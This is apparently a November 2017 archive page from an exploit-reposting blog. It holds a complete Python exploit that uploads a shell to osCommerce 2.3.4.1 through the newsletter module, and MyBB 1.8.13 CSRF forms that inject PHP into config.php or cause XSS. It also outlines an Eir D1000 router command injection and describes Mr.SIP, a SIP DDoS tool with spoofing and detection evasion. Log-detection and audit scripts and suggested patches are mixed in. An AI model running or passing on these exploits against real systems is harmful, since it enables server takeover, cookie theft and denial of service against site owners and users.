Monthly Archives: November 2017

E-Commerce PHP Shopping Cart Script osCommerce 2.3.4.1 – Arbitrary File Upload Vulnerability Exploit Code

# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload
# Date: 11.11.2017
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Vendor Homepage: https://www.oscommerce.com/
# Software Link: https://www.oscommerce.com/Products&Download=oscom234
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
"""
osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user
being privileged enough to send newsletters can exploit an object injection in the osCommerce core to
upload any file, allowing the user to gain shell access. The user does not need to be an administrator,
any account with access to the newsletters will do.
More details can be found here:
    https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/
"""
import urlparse
import argparse
import sys
import requests
DEFAULT_ADMIN_URL = "/catalog/admin/"
DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"
# Builds an authenticated session and returns it if it was successful
def authenticate(username, password, url):
    # Build the Session and grab the initial cookie
    session = requests.Session()
    session.get(url + "login.php", allow_redirects=False)
    get_params = {'action': "process"}
    data = {"username": username, "password": password}
    # Attempt the authentication
    r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False)
    if r.status_code == 302:
        return session
    else:
        return False
def upload_file(local_filename, session, url):
    newsletter_script = url + "newsletters.php"
    r = session.get(newsletter_script, params={"action": "new"})
    payload = {
        'module': 'upload',
        'title': 'uploaded_fname',
        'content': './'
    }
    # Create the vulnerable newsletter and grab its ID
    r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False)
    try:
        newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:]
        print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id)
    except:
        print "[-] The script wasn't able to create a new newsletter"
        exit(1)
    # Now lock the newsletter
    r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id})
    print "[+] Successfully locked the newsletter. Now attempting to upload.."
    # Send the final request, containing the file!
    files = {
        'uploaded_fname': open(local_filename)
    }
    r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files)
    print "[*] Now trying to verify that the file %s uploaded.." % (local_filename)
    shell_url = url + local_filename
    r = requests.get(shell_url)
    print "[+] Got a HTTP 200 Reply for the uploaded file!"
    print "[+] The uploaded file should now be available at %s" % (shell_url)
# Main Routine starts here
usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
        "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
        "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage)
parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True)
parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True)
parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True)
parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
args = parser.parse_args()
# Parse username and password
username = args.auth.split(":")[0]
password = args.auth.split(":")[1]
url = args.target_url
# If the user hasn't passed a path to the osCommerce Admin Panel, use the default
if not args.admin_path:
    url += DEFAULT_ADMIN_URL
else:
    url += args.admin_path
# Authenticate the user and establish the connection
session = authenticate(username, password, url)
if not session:
    print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php")
    exit(1)
else:
    print "[+] Authentication successful"
upload_file(args.file, session, url)
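
The script above issues three POSTs to newsletters.php in a fixed order (action=insert, then action=lock, then action=send on the same nID), which leaves a recognisable trace in the web server's access log. The following is an added detection sketch, not part of the original exploit or of osCommerce; the log lines are constructed, the function name and the 60-second window are assumptions, and a legitimate admin sending a newsletter quickly could also match, so treat a hit as a lead to review.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlparse, parse_qs

# Constructed access-log lines (common log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [11/Nov/2017:10:00:01 +0000] "POST /catalog/admin/login.php?action=process HTTP/1.1" 302 0
203.0.113.7 - - [11/Nov/2017:10:00:02 +0000] "POST /catalog/admin/newsletters.php?action=insert HTTP/1.1" 302 0
203.0.113.7 - - [11/Nov/2017:10:00:02 +0000] "POST /catalog/admin/newsletters.php?action=lock&nID=7 HTTP/1.1" 200 512
203.0.113.7 - - [11/Nov/2017:10:00:03 +0000] "POST /catalog/admin/newsletters.php?action=send&nID=7 HTTP/1.1" 200 512
198.51.100.4 - - [11/Nov/2017:11:00:00 +0000] "POST /catalog/admin/newsletters.php?action=insert HTTP/1.1" 302 0
198.51.100.4 - - [11/Nov/2017:11:20:00 +0000] "POST /catalog/admin/newsletters.php?action=lock&nID=8 HTTP/1.1" 200 512
198.51.100.4 - - [11/Nov/2017:11:21:00 +0000] "POST /catalog/admin/newsletters.php?action=send&nID=8 HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" \d{3}')
CHAIN = ("insert", "lock", "send")  # order of newsletters.php actions in the script above

def find_upload_chains(log_text, window=timedelta(seconds=60)):
    """Return (client, nID) pairs that POSTed insert -> lock -> send within `window`."""
    progress = {}  # client -> (next step index, time of the insert, nID seen so far)
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, stamp, method, target = m.groups()
        url = urlparse(target)
        if method != "POST" or not url.path.endswith("/newsletters.php"):
            continue
        query = parse_qs(url.query)
        action = query.get("action", [""])[0]
        nid = query.get("nID", [None])[0]
        when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
        if action == "insert":
            progress[client] = (1, when, None)  # (re)start the chain for this client
            continue
        step, started, seen = progress.get(client, (0, when, None))
        if step and action == CHAIN[step] and when - started <= window and seen in (None, nid):
            if step == 2:
                hits.append((client, nid))
                del progress[client]
            else:
                progress[client] = (2, started, nid)
    return hits

if __name__ == "__main__":
    print(find_upload_chains(SAMPLE_LOG))
```

Only the first client is reported with the default window; the second client's 21-minute workflow is reported only if the window is widened.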

 


MyBB 1.8.13 – Remote Code Execution + Cross-Site Scripting Vulnerability Exploit Code Proof of Concept

# Exploit Title: RCE in MyBB up to 1.8.13 via installer
# Date: Found on 05-29-2017
# Exploit Author: Pablo Sacristan
# Vendor Homepage: https://mybb.com/
# Version: Version > 1.8.13 (Fixed in 1.8.13)
# CVE : CVE-2017-16780
This RCE can be executed via CSRF but doesn't require it (in some special cases). The requirements are there shouldn't be a lock in the /install/ directory and then if you have access to the install directory you don't need CSRF, but if you don't then you need CSRF. I have included a patch and a description. The exploit will write PHP code to /inc/config.php which is then 'REQUIRE'd in most of the pages in MyBB, the PoC will just write lollol to the top of every page in MyBB. I also have an XSS but that I will report later.
There is a CSRF vulnerability in MyBB /install/index.php which can be used to inject PHP code into /inc/config.php which is then used in most of the pages (require MYBB_ROOT."/inc/config.php" is in most of the pages).
  
The vulnerability exists in the table creation process for sqlite databases, this is because the Database Path is then inserted into the /inc/config.php file in line 11 as $config['database']['database'] = 'DB Path';
 
The vulnerability occurs because MyBB doesn't properly escape the Database Path, allowing an attacker to easily inject PHP by inserting a DB Path of: lol'; echo 'lol. This will not cause any parse errors since there will be a '; added at the end. Of course the attacker can easily just execute code in the server, getting backdoor access to the server easily.
 
A PoC would be to host a site like this:
<form name="x" action="http://localhost/install/index.php" method="post">
    
<input type="hidden" name='dbengine' value="sqlite">
<input type="hidden" name='config[sqlite][dbname]' value="lol'; echo 'lol">
<input type="hidden" name='config[sqlite][tableprefix]' value="mybb_">
<input type="hidden" name='action' value="create_tables">
                                        
</form>
 
<script>document.x.submit();</script>
 
 
And when a victim logged in as admin to a MyBB website visits this site they will have a "lollol" at the top of every page (or you can also make it do much more malicious things).
 
A simple patch would be to change /install/index.php:1410 to:
if(strstr($config['dbname'], "./") !== false || strstr($config['dbname'], "../") !== false || strstr($config['dbname'], "'") !== false || empty($config['dbname']))
——————————————————————————————————–
# Exploit Title: XSS in MyBB up to 1.8.13 via installer
# Date: Found on 05-29-2017
# Exploit Author: Pablo Sacristan
# Vendor Homepage: https://mybb.com/
# Version: Version > 1.8.13 (Fixed in 1.8.13)
# CVE : CVE-2017-16781
No HTML escaping when returning an $error in /install/index.php can
lead to an XSS which can be used to take over an attacker account.
The vulnerability occurs in /install/index.php:2503 and occurs because
there is no html encoding of the $error. A simple way to exploit this
is to create an error by using the Database Server Hostname and
inserting HTML characters there.
It is a POST XSS and this is a PoC:
<form name="x" action="http://target.com/install/index.php" method="post">
<input type="hidden" name='dbengine' value="mysqli">
<input type="hidden" name='config[mysqli][dbhost]' value="<img src=x onerror=alert(0)>">
<input type="hidden" name='config[mysqli][dbuser]' value="lol">
<input type="hidden" name='config[mysqli][dbpass]' value="lol">
<input type="hidden" name='config[mysqli][dbname]' value="lol">
<input type="hidden" name='config[mysqli][tableprefix]' value="lol">
<input type="hidden" name='config[mysqli][encoding]' value="utf8">
<input type="hidden" name='config[mysql][dbhost]' value="localhost">
<input type="hidden" name='action' value="create_tables">
</form>
<script>document.x.submit();</script>
Using this attack you can steal the cookies and you can install the MyBB server as you want, giving you almost full control over the MyBB server.
A simple fix would be to change the function error_list($array) to:
function error_list($array)
{
    $string = "<ul>\n";
    foreach($array as $error)
    {
        $string .= "<li>";
        $string .= htmlspecialchars($error);
        $string .= "</li>";
    }
    $string .= "</ul>\n";
    return $string;
}
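
Both installer issues above depend on /install/ being reachable and unlocked, and the RCE leaves its trace on the database-path line of /inc/config.php. The following audit is an added example, not part of the original advisory or of MyBB; the function names are hypothetical, the lock file is assumed to be named `lock`, and the sample trees are constructed in a temporary directory.

```python
import os
import re
import tempfile

# The assignment the advisory names in inc/config.php; group 2 is whatever follows the ';'.
ASSIGN_RE = re.compile(
    r"^\s*\$config\['database'\]\['database'\]\s*=\s*'((?:[^'\\]|\\.)*)'\s*;(.*)$")

def audit_mybb(root, lock_name="lock"):
    """Return findings for a MyBB tree. lock_name is an assumption about the lock file's name."""
    findings = []
    install = os.path.join(root, "install")
    if os.path.isdir(install) and not os.path.exists(os.path.join(install, lock_name)):
        findings.append("install/ is present and not locked")
    config = os.path.join(root, "inc", "config.php")
    if os.path.isfile(config):
        with open(config, encoding="utf-8", errors="replace") as fh:
            for number, line in enumerate(fh, 1):
                m = ASSIGN_RE.match(line.rstrip("\r\n"))
                if m and m.group(2).strip():
                    findings.append("inc/config.php:%d has code after the database path" % number)
    return findings

def build_sample_tree(root, db_line, locked):
    """Create a constructed MyBB-like tree for the demo (not a real installation)."""
    os.makedirs(os.path.join(root, "install"))
    os.makedirs(os.path.join(root, "inc"))
    if locked:
        open(os.path.join(root, "install", "lock"), "w").close()
    with open(os.path.join(root, "inc", "config.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n" + db_line + "\n")

def demo():
    clean = "$config['database']['database'] = 'mybb.db';"
    injected = "$config['database']['database'] = 'lol'; echo 'lol';"  # value from the PoC above
    results = []
    for db_line, locked in ((clean, True), (injected, False)):
        with tempfile.TemporaryDirectory() as root:
            build_sample_tree(root, db_line, locked)
            results.append(audit_mybb(root))
    return results

if __name__ == "__main__":
    print(demo())
```

A trailing comment on the assignment line would also be reported, so a finding on config.php means the line should be read by hand.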

Eir D1000 Wireless Router – WAN Side Remote Command Injection Exploit

 

 

# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
# Website: https://devicereversing.wordpress.com
# Tested on Firmware version: 2.00(AADU.5)_20150909
# Type: Webapps
# Platform: Hardware
 
Description
===========
By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access to the web administration interface from the Internet-facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command.
Available code here:
https://www.exploit-db.com/exploits/40740/

VoIP SIP Based Audit and Attack Tool DDoS Scanning Pen Testing Download

 

 

SIP-Based Audit and Attack Tool

Mr.SIP is a tool developed to audit and simulate SIP-based attacks. It was originally developed for use in academic work, to help develop novel SIP-based DDoS attacks and defense approaches. It was later redeveloped into the current version, with the idea of turning it into a fully functional SIP-based penetration testing tool.

 

It was used in an academic journal paper titled “Novel SIP-based DDoS Attacks and Effective Defense Strategies” published in Computers & Security 63 (2016) 29-44 by Elsevier, Science Direct http://sciencedirect.com/science/article/pii/S0167404816300980.

 

In its current state, Mr.SIP comprises four sub-modules: SIP-NES, SIP-ENUM, SIP-DAS and SIP-ASP. Since it offers developers a modular structure, the authors will continue to add more modules, and it is open to contributions from the open-source developer community.

 

SIP-NES takes an IP range or IP subnet as input. It sends a SIP OPTIONS message to each IP address in the subnet and, according to the responses, outputs the potential SIP clients and servers on that subnet.

 

SIP-ENUM sends REGISTER messages to each client IP address in the output of SIP-NES and, according to the responses, outputs which SIP users are valid in that network.

 

SIP-DAS (DoS Attack Simulator) is a module developed to simulate SIP-based DoS attacks. It comprises four components: spoofed IP address generator, SIP message generator, message sender and scenario player. It needs outputs of SIP-NES (Network Scanner) and SIP-ENUM (Enumerator) along with some pre-defined files.

 

SIP-DAS basically generates a legitimate SIP INVITE message and sends it to the target SIP component via TCP or UDP. It has three different options for spoofed IP address generation: manual, random, and selection of a spoofed IP address from the subnet. IP addresses can be specified manually or generated randomly. Furthermore, in order to bypass URPF filtering, which is used to block IP addresses that do not belong to the subnet from passing onto the Internet, we designed a spoofed IP address generation module. The spoofed IP generation module calculates the subnet used and randomly generates spoofed IP addresses that appear to come from within the subnet.

 

In order to bypass automatic message generation detection (anomaly detection) systems, random “INVITE” messages are generated that contain no patterns within the messages. Each generated “INVITE” message is grammatically compatible with the SIP RFCs and acceptable to all of the SIP components.

 

The “INVITE” message production mechanism specifies the target user(s) in the “To” header of the message. This attack can be executed against a single user or against legitimate SIP users on the target SIP server as an intermediary step before the DoS attack. The legitimate SIP users are enumerated and written to a file. Next, they are placed randomly in the “To” header of the generated “INVITE” messages. The “Via,” “User-Agent,” “From,” and “Contact” headers within an “INVITE” message are syntactically generated using randomly selected information from the valid user agent and IP address lists. The tag parameter in the “From” header, the branch and source-port parameters in the “Via” header, and the values in the “Call-ID” header are syntactically and randomly generated using the valid user agent list. In addition, the source IP addresses in the “Contact” and “Via” headers are also generated using IP spoofing.

 

UDP is widely used in SIP systems as a transport protocol, so attacks on the target server are implemented by sending the generated attack messages over the network using UDP. TCP can optionally be used as well. The message sender of SIP-DAS allows the optional selection of how many SIP messages are sent per second. The number of SIP messages that can be sent in one second depends on the resources (CPU and RAM) of the attacker machine.

 

SIP-ASP (Attack Scenario Player) allows the development of various SIP-based DoS attack scenarios through the use of SIP-DAS as the framework.

Usage Examples:

[Screenshot: SIP-NES scan output]

[Screenshot: Call flow created by SIP-NES]

[Screenshot: SIP-DAS attack output]

[Screenshot: Call flow created by SIP-DAS]